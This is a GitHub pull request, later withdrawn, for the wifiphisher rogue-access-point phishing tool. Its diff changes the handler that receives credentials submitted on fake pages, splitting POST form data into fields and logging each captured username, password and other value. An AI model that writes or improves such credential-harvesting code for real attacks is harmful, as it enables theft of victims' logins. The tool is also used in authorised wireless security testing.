### PR TITLE
Deleted - Please close this PR as it continues on PR #523

### DIFF
--- a/wifiphisher/common/phishinghttp.py
+++ b/wifiphisher/common/phishinghttp.py
@@ -40,17 +40,21 @@ class ShowPhishingPageHandler(tornado.web.RequestHandler):
 class ReceiveCredsHandler(tornado.web.RequestHandler):
 
     def post(self):
-        self.redirect("/loading")
-        wifi_webserver_tmp = "/tmp/wifiphisher-webserver.tmp"
-        with open(wifi_webserver_tmp, "a+") as log_file:
-            log_file.write('[' + T + '*' + W + '] ' + O + "POST " +
-                           T + self.request.remote_ip + " " +
-                           R + repr(self.request.body) +
-                           W + "\n"
-                           )
-            log_file.close()
+        formData = self.request.body.split('&')
+        formValues = []
+        for i in formData:
+            formValues.append(i.split('='))
+        for i,x in formValues:
+            with open("/tmp/wifiphisher-webserver.tmp", "a+") as log_file:
+                log_file.write('[' + T + '*' + W + '] ' + O + "POST" + W + " request from " + T + 
+                               self.request.remote_ip + W + " input[" + G + 
+                               i + W + "] = " + 
+                               R + x + W + 
+                               "\n")
+                log_file.close()
         global terminate, creds
-        creds.insert(0, repr(self.request.body))
+        for i,x in formValues:
+            creds.insert(0, repr(i + " = " + x))
         terminate = True
 
 


### PR DESCRIPTION
# EDIT: Please delete this PR... These changes are included in [this PR](https://github.com/wifiphisher/wifiphisher/pull/523)

I am used to putting multiple form elements into one data string and sending it with an ajax request, like so:

`$.post( '/post', 'username=' + $('input[name=username]').val() + '&password=' + $('input[name=password]').val() + '&address=' + $('input[name=address]').val() + '&phone=' + $('input[name=phone]').val() )`

This would result in Wifiphisher logging like so:

`[*] POST request from 10.0.0.1 'username=laozi999&password=fakepassword&address=123 Long Street&phone=123456789'`

With these changes it will log as follows:
(an error is shown in the second screenshot (not sure if it has an open issue already), but the captured credentials are visible at the top)

![screenshot from 2017-03-19 11-04-33](https://cloud.githubusercontent.com/assets/24898383/24077433/2b3ef64a-0ca1-11e7-938b-3a173ec785cc.png)

![screenshot from 2017-03-19 11-05-15](https://cloud.githubusercontent.com/assets/24898383/24077435/2e70e3f0-0ca1-11e7-98b0-20156e1bebba.png)

